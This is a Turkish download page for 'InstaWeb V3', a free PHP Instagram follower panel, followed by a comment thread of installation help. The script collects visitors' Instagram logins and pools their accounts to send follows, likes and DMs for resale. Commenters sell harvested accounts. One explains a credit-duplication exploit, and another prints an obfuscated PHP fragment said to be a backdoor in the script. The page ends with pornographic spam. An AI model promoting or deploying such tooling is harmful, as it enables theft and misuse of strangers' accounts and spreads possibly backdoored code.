Başlangıç / PHP Scriptler / İnstaWeb V3 İnstagram Takipçi Scripti Ücretsiz

İnstaWeb V3 İnstagram Takipçi Scripti Ücretsiz

Script piyasada çalışan ve takipçi gönderebilen nadir scriptlerdendir. Sisteme giriş yapan kullanıcıları şifre değiştirmedikleri sürece patlatmaması için gerekli düzenlemeler yapılmıştır. Hız olarak oldukça hızlıdır. 3dk’da 10k ya kadar takipçi ve beğeni gönderebilmektedir. Sistemde sürekli güncelleştirmeler yapmaktayız. Bu güncelleştirmeler ile gün geçtikte daha gelişmiş bir script haline gelmektedir. Scriptsel yaşanan sorunlar ile ilgili destek sağlamaktayız.

Scripti piyasada iş yapan sitelerin çoğu kullanmaktadır. Siz de bu scripte sahip olarak para kazanabilirsiniz.

Mevcut Sistem Sürümü : V3

Kullanıcı Tarafı İçin Genel Standart Özellikleri
* Siteye giren kullanıcılar kendi instagram anasayfalarını görmektedir. Bu gönderileri inceleyebilmekte ve yorum yada beğeni gönderebilmektedir.
* Kullanıcı tarafında aynı zamanda Direct Mesaj gönderme ve Resim yükleme modülleri de mevcuttur.
* Kullanıcılar sitem üzerinden instagramın mobil uygulamasında yer alan tüm özellikleri de yapabilmekteler.
* Siteye giren kullanıcılar sizin belirlediğiniz ve her gün yenilenen miktarda takipçi kredisi, beğeni kredisi ve yorum kredisi kazanmaktadır ve bunları yine kullanıcı panelleri üzerinden kullanabilmektedir. Kullanıcıların kazandığı kredileri yönetim panelinden siz ayarlayabilmektesiniz. Her gün yenilenen krediye ek olarak ilk girişte farklı bir kredi de tanımlayabilmektesiniz. Örneğin: İlk kayıt sırasında 200 takipçi kredisi, her gün yenilenen 50 takipçi kredisi gibi. Yine sistem üzerinden bu kredilerin ne kadar sürede bir yenileneceğini de siz belirlemektesiniz. İsten günde 1 kere yenilersiniz, isterseniz de 2 saat de 1.
* Kullanıcılar sisteme girdiklerinde takipçi, beğeni ve yorum havuzuna dahil olmaktalar. Dilerseniz bu havuzdan çıkartarak kullanıcıları premium üye olarak da tanımlayabilirsiniz.
* Sistem üzerinde kullanıcılar kendilerinin takip edip, onları takip etmeyenleri takipten çıkartma yada takip etmediklerini takip edebilme sistemlerine de sahip olmaktadırlar.

Yönetim Tarafı Özellikleri
* Sistem yöneticisi ayarlar bölümünden sitenin tüm özelliklerine kontrol edebilmektedir. Ayarlar bölümünden iletişim için kullanılacak whatsapp ve skype bilgileri ile sistemsel tüm değişiklikleri bu bölümden sağlayabilmektesiniz. Ayrıca yine ayarlar bölümünden sisteme her giren kullanıcının oto takip edeceği kullanıcıları ve sisteme girmesini istemediğiniz kullanıcıların engelleneceği bölüme de ayarlayabilmektesiniz.
* Cpanelden ekleyeceğiniz tek cron ile tüm cronların yönetimini admin panelinden yapabilme kabiliyetine erişebilmektesiniz.
* Yönetim kısmının işlemler bölümünde pasife düşen kullanıcıları tek buton ile temizleyebilirsiniz.
* Yine bu işlem bölümünde kullanıcı aktarma paneli sayesinde idass ile yada cookies ile kullanıcı yükleyebilmektesiniz. Burada eklenen kullanıcılar sistem tarafından tek tek kontrol edilerek eğer çalışıyorlarsa sisteme dahil edilmektedirler.
* Yönetim kısmının üyeler bölümünde tüm üyeleri, kullanıcı adı, nick , aktif, pasif, şifre veya cookies şeklinde filtreleyebilmektesiniz. Üyelerin detay bölümünde de mevcut kredilerini görebilir, beğeni,takipçi yada yorum havuzunda kullanımını kapatabilir yada admin olacak şekilde ayarlayabilirsiniz. Yine bu detay kısmından kullanıcıya oto beğeni paketi tanımlayabilirsiniz.
* Yönetim panelindeki sayfa bölümünden sitede yer alan içerikleri ckeditor yardımı ile kodlara bulaşmadan düzenleyebilirsiniz.
* Sistem içerisinde 1 adet de blog yönetim sistemi bulunmaktadır. Bu blog yönetim sistemi sayesinde seo için gerekli olan makalelerinizi ekleyebilir dilediğiniz title ve seo urlyi bu kısımdan tanımlayabilirsiniz.
* Yönetim paneli üzerinden bayi sistemini de satın aldıysanız eğer bayiler tanımlayarak bu bayilerinde sizin sisteminiz üzerinden satış yapmasını sağlayabilirsiniz.
* Sistem üzerinde multi blok sistemi mevcuttur. Örneğin bir kullanıcının takip edebilmesi, beğeni gönderebilmesi ve yorum yapabilmesi ayrı ayrı ele alınmıştır. Yani bir kullanıcı eğer instagram tarafından takip edilmesi bloklandıysa, sadece takip havuzundan çıkarılır fakat beğeni yada yorum gönderilmeye devam eder. 3 saat sonunda tekrar kontrol edilir. Eğer takip işlemi yapabiliyorsa bu sefer takip havuzuna geri aktarılır.

Bayi Özellikleri
* Tanımladığınız bayilerin özel bir giriş urlsi ve kullanıcı adı şifresi bulunmaktadır.
* Bu bayilere sisteminizde 50K kullanıcı bulunsa bile sadece 10k sını kullanabilmelerini sağlayabilirsiniz. Bu kısıtlama sistemini de dilerseniz. Beğeni için ayrı takipçi için ayrı yorum için ayrı tanımlayabilirsiniz. Max. kullanıcı sayısının yanı sıra bu kullanıcılar ile yapacağı işlem sayısınıda kısıtlayabilmektesiniz. Örn: Bir bayinize 10K kullanıcı limiti tanımladınız ve günlük 5 işlem limiti verdiniz. Bu kullanıcı 1 gün içerisinde maximum 5 defa 10k ya kadar dilediği kişiye takipçi gönderebilir. Bu işlem limitlerinin attığı takipçi ile alakası yoktur. 100 Takipçi bile atsa 1 işlemini harcamış olmaktadır.
* Bayilere tanımladığınız oto beğeni satma hakları toplam olarak verilmektedir yani günlük olarak sıfırlanmamaktadır. Bayiye bu oto beğeni de max kaç oto beğeni satabileceğini ve kaç adet satabileceğini tanımlayabilmektesiniz. O bayi de oto beğeni için tanımladığınız max kredi kadar oto beğeni paketi satabilmektedir. Örn: Siz bir bayinize oto beğeni için 5k max. kullanıcı ve 10 adet paket tanımladınız. Bu bayiniz 5k’ya kadar 10 adet dilediği şekilde oto beğeni paketi satabilir. 1 tane 2k oto beğeni, 1 tane 5k oto beğeni, 1 tane 500 oto beğeni vs. gibi.
* Sistem üzerinde cinsiyet ayrımı da bulunmaktadır. Siz bu bayilerinize dilerseniz bayiliği açarken cinsiyet seçebilme imkanı da sağlayabilirsiniz. Böylece bayileriniz sadece bayan beğeni paneline bile sahip olabilirler.
* Bayilik panelini verirken son kullanım tarihi veriyorsunuz ve bayiler o tarih gelince otomatik olarak sisteme girememiş oluyorlar. Bayilerinizin üyeliklerine not ekleme imkanınızda bulunmaktadır.

* Oto DM atma sistemi. Belirlenen kişileri takip eden kullanıcılara oto dm atma.
* Oto yorum atma sistemi. Belirlenen kişilerin gönderilerine oto yorum atma.
* Bayilik bölümüne ip bazlı, aktif olunduğunda yeni girişin engellenmesi sistemi. Bu sistem sayesinde multi bayi kullanımının önüne geçildi.

Panelden Görüntüler

Kesinlikle piyasadakiler ile karıştırmayınız lisanslı ve güncel scripttir açık yoktur tüm özelikler hızlı ve sorunsuzdur. Sistem lisansı ücretsizdir alta verdiğim siteden lisans oluşturunuz.

V3.5.1 sürümüdür.

PHP 5,6 OLMALIDIR.

ÖZEL KURULUM : 50TL

SKYPE: Live:kafascript

Demo Adresi Dosyayı İndir

Lütfen İndirmeden Önce Demo Adresine Gözatmayı Unutmayın!

Rar Şifresi: www.kafascript.com

 • Cihan Kara

  digerini kurdugumda 500 Internal Server Error hatasını verdı bunda vermez dımı yardımcı olurmusunuz

  • Merhaba, kurulumu yapın hata verir ise host firması ile görüşün sıkıntı oradan kaynaklı olabilir.

   • Cihan Kara

    hostınger ile kuruyorum ama nasıl yapıcam

    • Ücretli bir hosta kurun.

     • Cihan Kara

      yanlız bı sorum daha olucak başka scrıpt daha kurdum aynı yerden çalıştı burdakınde bu hatayı verdı ama kafam buna karıştı benım :/

     • Sistem son sürüm onun için daha fazla sistem istiyor.

     • Mermi Can

      skype: [email protected] hocam bir eklermisin skype fonksiyonel hatalar var.

   • Abuzer Şşkn

    ÜCRETLİ HOSTA KURDUM HAALA HATA ALIYORUM 500 ERROR YARDIMCI OLURMUSUN

 • Selçuk Çağayan

  Scripti siz denediniz mi? Fonksiyonlarında bi sıkıntı var mı?

 • Joseph Kazandırıyor

  lisans istiyor ? varsa [email protected] a mail atarmısınız

 • Joseph Kazandırıyor

  lisans istiyor ? varsa [email protected] a mail atarmısınız

 • Kadir Polat

  requires the ionCube PHP Loader ioncube_loader_lin_5.4.so to be installed by the website operator. If you are the website operator please use the ionCube Loader Wizard to assist with installation <= ADMİN BU HATAYI NEDEN VERİYORRRRR

  • php sürümü 5.6 yapın

   • Kadir Polat

    lisans verirmisin

    • İnstaWorlds

     sistem lisanssızdır şuanda. bir sorun olursa buradan yazabilir veya [email protected] adresine mail atarak destek alabilirsiniz.

 • Joseph Kazandırıyor

  lisans istiyor ? varsa [email protected] a mail atarmısınız

 • Etem Kızılfeli

  arkdaşlar sistemi çok güzel çalışıyor ben denedim ve oldu sizlerde demo incelemek istiyorsanız panelyeri.xyz adresine gidiniz , kafascrpti yöneticisine buradan çok teşekkür ederim çok işime yarayacak bir de user dosyası varsa elinizde satın alabilirim seviliyorsun kafascrpti 🙂

  • Cihan Kara

   etem

   • Etem Kızılfeli

    efendim ?

    • Joseph Kazandırıyor

     Efen Kardeş Lisansı Nasıl Hallettin Banada Yardımcı Olursan Sevinirim [email protected] insta @takipci.kapsami

     • Etem Kızılfeli

      lisans istemiyor kardeşim direk kurulumunu yaptım sunucu sadece ücretli olsun yeter 5.6 kurman gerekiyor iletişime geçebilirin [email protected] yardımcı olamya çalışırım

     • Joseph Kazandırıyor

      Kardeşim Yazdım Sana Yardımcı Ol Sana Zahmet

     • İnstaWorlds

      bir sorun olursa buradan yazabilir veya [email protected] adresine mail atarak destek alabilirsiniz.

     • Mermi Can

      Kardeşim ben kurdum, fakar şöyle bir durum var ne admin panelinden nede bayi panelinden beğeni gnderimi yapmıyor hata veriyor bu soprunu nasıl giderebiliriz?

  • Ahmet

   kardeş hangi hosting firmasını kullanıyorsun.

   • İnstaWorlds

    Merhaba | Yöncü Bilişim | Veyahut Farklı Bir Firma Kullanmanızı Öneririm.

    • Mermi Can

     Merhaba, hocam ben kurulumu yaptım fakat admin panelinden ğei veya takipçi gönderimi yapılamıyor veya bayiliklerden de aynı şekilde hatalar alıyorum bunları nasıl düzeltebilirim?

  • TC Ahmet Barış Akarsu

   kardeş hangi host firmasını kullanıyorsun ?

   • Etem Kızılfeli

    kendi hostum

    • TC Ahmet Barış Akarsu

     o nasıl oluyo aga

  • Abuzer Şşkn

   kardeşim banada yardımcı olurmusun http://www.facebook.com/Mr.Persians İletişime Geçermisin

   • İnstaWorlds

    Merhaba Ekleme İsteği Yolladım Onay Bekliyorum.

    • Ceyran Nuri

     merhaba

     • İnstaWorlds

      merhaba buyrun ?

     • berat sönmezler

      kardeşim benimle iletişime geçermisin? skype: instapanelin twitter: beratovski_

     • berat sönmezler

      hocam yardımcı olurmusunuz bana da sql sorunu var

    • Ceyran Nuri

     https://www.facebook.com/nurullahcan22 hocam banada yardımcı olurmusunuz

    • Mermi Can
  • Sinan Özer

   100 user : 10 tl
   500 User : 25 tl
   1000 User +50 : 40 tl
   2000 User +100 : 80 tl
   seklınde user saglıyrum
   skype : [email protected]

  • Zekeriya Yavuz

   m.facebook.com/qbymaho
   [email protected] yardimci olur musun ucretli vpsde 500internal hatasi aliorum.php surumu=5.6.30

   Yardimci olursan sevinirim..

   • Etem Kızılfeli
    • Agit Özdel

     Mrb script kurulumu hakkında yardım edermisiniz yardım ücretli ücreti öderim acil

     • eren bilir

      skype: by-cyber67 ekle yardımcı olayım

     • Agit Özdel

      Eklendi kabul et

     • Etem Kızılfeli

      buyur kardeşim ekle facebooktan
      http://fb.me/etemkizilfeli

     • Agit Özdel

      Eklendi kabul et …..

     • Agit Özdel

      Eklendi herkes

  • Etem Kızılfeli

   Kurulum Yapamayan Arkdaşlar İzlesin Kafascrpti.com’a yönlendirdim linkleri admin bey 🙂 isterseniz ekliyebilirsiniz sitenize
   https://www.youtube.com/watch?v=jkjtzZLLUr8

 • Joseph Kazandırıyor

  lisans istiyor ? varsa [email protected] a mail atarmısınız

 • Burak Can

  sorunsuz çalıştı bunu arıyodum çok saolun 😀 sadece cronlarda sorun var onuda halledicez artık https://takipciustasi.com

  • Sahil

   Abicim cron nerede yardımçı olurmusin

   • İnstaWorlds

    admin panelindedir. inceleyerek bulabilirsiniz. cron ayarlarınıda internetten araştırarak oto giriş olarak ayarlayabilirsiniz. – bir sorun olursa buradan yazabilir veya [email protected] adresine mail atarak destek alabilirsiniz.

 • Joseph Kazandırıyor

  Hocam Yaptım Ben Üçretli Host Yinede Lisans İstiyor [email protected] @Oguzcute:disqus

 • Joseph Kazandırıyor

  Hocam Yaptım Ben Üçretli Host Yinede Lisans İstiyor [email protected]

  • İnstaWorlds

   merhaba mail adresinize mesaj ilettim ancak cevap vermiyorsunuz.

   • Joseph Kazandırıyor

    Hocam Sen Mail Ver Ben Yazayım Gözükmüyor

   • Joseph Kazandırıyor

    Hocam Sen Mail Ver Ben Yazayım Gözükmüyor.

 • Etem Kızılfeli

  Arkdaşlar Cron Ayarlarını Yapmazsanız Scrpti Doğru Çalışmaz Sql ‘a girip siteismi.com olanları kendi sitenizin adını yazın

 • El Behram Own3d

  http://www.instasehri.com buyrun buda
  demosu olsun

  • İnstaWorlds

   Sitenizede Yakışmış 🙂 Güzel | iyi günlerde kullanın.

  • berat sönmezler

   bana ulaşırmısın kardeşim skype: instapanelin twitter: beratovski_ wp 05078096998

  • Ceyran Nuri

   user varmı

 • Etem Kızılfeli

  User Satıyormusunz ?

  • Sinan Özer

   100 user : 10 tl ….
   500 User : 25 tl
   1000 User +50 : 40 tl
   2000 User +100 : 80 tl
   seklınde user saglıyrum
   skype : [email protected]

 • Selçuk Çağayan

  config dosyalarına mysql bilgilerini yaz

 • BURAK YILDIRIM

  The requested URL /member was not found on this server. Hata’nın çözümü nedir?

 • Abuzer Şşkn
  • İnstaWorlds

   Sorun Çözülmüştür Teşekkürler.

   • Emre AKDAŞ

    @nstaworlds kardeşim aynı hatayı bende alıyorum sorun nedır? Cevaplarsan sevınırım Iletısım bılgılerım WhatsApp; +90 506 068 0410 SKYPE: oyunsevr mail; [email protected]

   • Serhat Sürkündağ

    nasıl çözdün?

 • İnstaWorlds

  Merhaba . Klasörlerin İçerisinde Bulunan | App/Config/config.php ve App/Config/config.local.php kendi sitenize göre düzenleyin. hata almazsınız.

 • İnstaWorlds

  Merhaba Telefon Ödemeli birçok firma bulunmaktadır. [email protected] adresine mail atarsanız kısa bir bilgi verebiliriim.

 • İnstaWorlds

  ne hatası aldığınız buradan bize “ss” atabilirseniz sorununuzu çözüp yardımcı olabilelim.

 • Sinan Özer

  100 user : 10 tl
  500 User : 25 tl
  1000 User +50 : 40 tl
  2000 User +100 : 80 tl
  seklınde user saglıyrum
  skype : [email protected]

 • Ceyran Nuri

  hocam ferrezzers.com HTTP ERROR 500 hatası alıyorum hatam nerede

  • İnstaWorlds

   Merhaba Bu Hata Nelerden Olabilir:

   Hosting Desteklemiyor Olabilir | Database Ayarlarınızı Yapmamış Olabilirsiniz | Database Ayarlarınzı Yaparken Ufak Birşey Kaçırmış Olabilirsiniz Hemen Göz Atalım.

   Cpanel Kullananlar.

   Mysql Girip DBNAME Kısmını dataname isminizi yazınız.
   Myslq Username Bölümüne. Geçin Orayı Doldurup Şifrenizi Yazınız. BU Açtıklarınızı Aklınızda Tutun “DBNAME-MYSQL USERNAME-Mysql Şifresi”

   Şimdi Gelelim Filezilla İle Sitemize Bağlanalım. Bu Adımları İzleyiniz

   App/Config/ < Burada Saydığım Klasörleri Açınız. Data Sonrasında

   config.php Ve config.local.php editlemeniz gerekiyor. bunları yaptıktan sonra.

   PhpMyAdmin Bağlanalım. Açtığımız Dataname Ye Sql Mizi Aktaralım. Kurulum Bitmiştir. Bunları Yaptığınız Taktirde Hata Alıyorsanız. Sorun Şudur.

   Hosting Desteklemiyor Olabilir | Teşekkürler. İyi Geceler.

   • Ceyran Nuri

    host desteklemediğini nasıl anlarız İsimtescil Le anlaşmalıyım onun hostlarını kullanıyorum

   • Ceyran Nuri

    free to play host sitelerinde caılırmı

   • Ceyran Nuri

    iletişime gecermisiniz [email protected] 0543320329 wassap

   • ibrahim

    veya script’in dosyalarını atarken bağlantı kesilmiştir. genelde db name ile user karıştırılmakta

 • kimya sorulari

  takipçi gönderme sayfası vs yok hata verıyor?

 • yugov lavaka

  Etem iletişime geçermisin benimle [email protected]

 • yugov lavaka

  Kurulum için yardımcı olabilecek varmı ?

 • MKRK

  ücretli host kullanıyorum böyle bir hata alıyorum. http://i.hizliresim.com/DP79v1.jpg çözümü nedir bilen biri ulaşabilir mi
  insta:mertcankrklk
  mail:[email protected]

 • Zekeriya Yavuz

  [email protected] -m.facebook.com/qbymaho yardimci olacak varmi.kuruyorum fakat /member klasoru filan yok…

 • Emre Ataş

  Beyler öncelikle script 2.7 dir sace editlenmiş halidir.
  scriptte kredi açığı mevcuttur ve admın panelinden insagram işlemleri diyip yeni işlem dediginizde kullanıcı adı aradıgınızda hata verecektir
  gelelim kredi açığına öncelikle yeni bir gizli sekme açın bu scriptin bulundugu site olsun
  o siteye gizli sekmeden girin daha sonra normal sekmeden girin hesabınızla giriş yapın 2 sindede sonra gizli sekmedeki kredilerin hepsini harcayın bitirin normal sekemeye dönün
  krediniz ne kadar harcarsanız harcayın çıkış yapmayana kadar 0 lanmayacak sistmdeki son usere kadar çekim yapabileceksiniz. ve 2.7 lerdeki genel kredi açığıdır.

 • yardımcı olur musunuz? tema görünüşte sorun var https://sosyalm.com/instagram/
  facebook = https://www.facebook.com/burakalac4

 • Ali Osman Şen

  Sistemi sorunsuz kurdum lakin içindeki hacklinkleri temizleyemedim. Yardımcı olur musunuz?

 • Mermi Can

  Merhaba arkadaşlar, siteyi kurdum lakin şöyle bir sorunum var, Beğeni, takipçi göndermiyor? Eğer sistemi çalışır vaziteyte teslim edene 1k aktif türk takipçi veririm [email protected] adresinden bana ulaşabilirsiniz.

  • Mermi Can

   [email protected] skype den ekleyip yardımcı olursanız sevinirim.

   • Kaan Ocak

    fb.com/orjkaanocak Mesaj at halledelim 2dk

 • ekrem halil

  kurulum için yardımcı olurum

 • Selçuk Çağayan
  • Kaan Ocak

   sql bilgilerini doğru girdiğinden emin ol

  • Talha

   aynen kardesim aynı hata

 • Agit Özdel

  Ben Kurdum Bakabilirsiniz : İnsta.medya-benim.net
  Skype: Derdogever

 • Kaan Ocak

  Lisans istiyor hocam halledermisniz site: https://trkisa.link/

 • Agit Özdel

  Web siteme Instagram Twitter hileleri kuracak kişileri arıyorum bütçem 50 TL program ücretsiz olmuş uygulamasını yapıp play Store’da yükleyeceksiniz reklamlarda da kazandigimin %20 onun olacaktır​ lütfen işini düzgün yapsın web sitemin adresi: http://medya-benim.net ismi çok güzel domain ı hosting i natro ve uzmantescilden alınmıştır not: bunları yapana özel Adsense onaylanıp alt alanda hediye orada adsenseyi onaylatip tüm kazancı onun olacaktıriletişim: 05447451031 Whatsapp ekleyin görüşelim

  • Agit Özdel

   Güncel

  • Ceyran Nuri

   50 tl ye git sakız al

 • Ender Çinar

  Bende lisans istiyor beyler çalışıyordu yeni geldi lisans isteme sitem http://medyaevreni.com

 • Ender Çinar

  Arkadaşlar herkesi beklerim sistem yeni kullanıcı ekliyoruz yavaştan bize yardımcı olun !!

  http://medyaevreni.com

  • Ceyran Nuri

   user varmı

   • Ender Çinar

    Yetwrince var

  • Sinan Özer

   buyrun skype : [email protected]

   • Ender Çinar

    Yanlış skype endercnar ekler misin

 • Melik Güçin
 • Melik Güçin

  facebook Melik Güçin İnstagram melikgcn ulassın bırı lutfen

 • Etem Kızılfeli

  kurulum yapamayan arkdaşlarımız izlesin
  https://www.youtube.com/watch?v=jkjtzZLLUr8

 • TC Ahmet Barış Akarsu

  beyler çalışan hosting buldum .
  hosting linki : https://www.poyrazhosting.com
  demo site : http://takipdeyim.ml/

 • FREE VİDEO

  meraba ben paneli kurdum cron ayarlarınıda yaptım fakat takipci kredilerini zamanladıgım şekilde sıfırlamıyor panel bide oto begenisi arızalı bunları onarabilicek varsa benimle iletişime geçermi instagram:kazandirma.panelim profilim aktiftir bu sorunu halleden kişinin reklamını yapabilirim 2 gün boyunca lütfen iletişime geçin

  • Merhaba, bir kaç gün içinde yeni sürümü çıkacak onu beklerseniz onda tüm sorunlar çözülmüş olacak.

 • Aykut Can Kaygısız

  cron konusunda yardımcı olurmusun kardeş

 • Kənan Abbaszadə

  Error in Database Connection. Could not connect to Database! Please check your connection parameters. (0)

  Yardimci Olsaniz 🙂 ?

 • Pingback: İnstaloji İnstagram Scripti 2017 Ücretsiz | - Kafa Script()

 • Hasan Hüseyin Cansever

  hocam admin panelini nasıl gireceğiz ?

 • Cemal Karapınar

  Bende de bu hatayı veriyor config ayarlarını sorunsuz yaptım mysql de yeni oluşturdum şifreside doğru 2 kere teyit ettim ama yinede bu hatayı veriyor
  https://uploads.disquscdn.com/images/ca50acc2a9a40320c71837768745ada18b2679ad335009bb8621e8e33b8592dd.png

  • Batuhan Tuncer

   bu hatayı çözen yardım edebilirmi fb/frown1

 • Mert Mert

  KREDİ AÇIĞINI NASIL KAPATABİLİRİZ ?

 • Ceyran Nuri

  Sorun yaşıyorum admin iletişime gecermisin
  http://annemevyemekleribursa.com/
  403 Forbidden Access to this resource on the server is denied!
  Host İsimtescilden
  Cpnel Sürümü 62.0.16
  Linux 5.x.x 6.x.x
  Sorun nedir

 • Ceyran Nuri

  User Alınır

 • Ceyran Nuri

  Kurdum Gayet İyi Emeği Gecen Herkese Teşekkürler .
  ins/darkeyboard wpa 05433203239

 • By Sk

  Moruk /member yerine gelince not found hatası alıyorum düzeltebilene .club domain vericem iletişim: instagram.com/sametkarakas

 • burakkaan

  Script çalışıyormu deneyen var mı ?

 • Oğuzhan ER

  merhabalar üye girişini yaptığımda admin paneli sayfasına atıyor yardımcı olabilir misiniz teşekkür ederim

 • Batuhan Tuncer

  yav sövücem olmyacak mysql ayarlarını tam yaptım gene

  500 Internal Server Error

  Error in Database Connection. Could not connect to Database! Please check your connection parameters. (0)

  Hatayı veriyor

 • Muhammed Abalı

  http://link.tl/11nls Script Takipçi Sorunu Çözüldü…..

 • arkadaşlar scriptin içerisinde zendli olan dosyayı dezend ettiğimde exploit çektiğini gördüm keriz gibi kurup userları kaptırmayın kanıt;

  include( “../config.php” );
  $fname = $_SERVER[‘PHP_SELF’];
  $fname = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQEÿ( _obfuscate_DTIfMBg4CRsICzYhDiI4LAEJLQcDLiIÿ( __FILE__ ), ( “DownloadFileName” ).”.php”, $fname );
  $fname = _obfuscate_DT4jHi0IIi8MLgYnAipbPyw9IR0UAQEÿ( ( “ExploitsDir” ).”/”, “”, $fname );
  $url = “http://”.$_SERVER[‘SERVER_NAME’].$fname.”?f=”._obfuscate_DRkHJz41OylAAiEOLBQJXAMvJgUnIhEÿ( $_GET[‘f’] ).”&s=4″;

 • Bahadır Emre Kapan

  http://bluechest.us
  Lisans veririmsiniz hocam
  [email protected]

 • poyraz

  sql yüklerken sadece admin ve bayi listeleniyor şuradaki hatayı alıyorum. https://i.hizliresim.com/nWbbXR.jpg

  • Talha

   aynen kardesim bende aynı hatayı alıyorum

 • Bayrak Sevdasi

  User:Pass Veya Cookies User Karşılığı İnstaWeb Panel Kurulur -> Buyrun Örnek Vereyim -> http://www.twpaneliz.cf <– Beklerim 🙂

porno HD Seks izle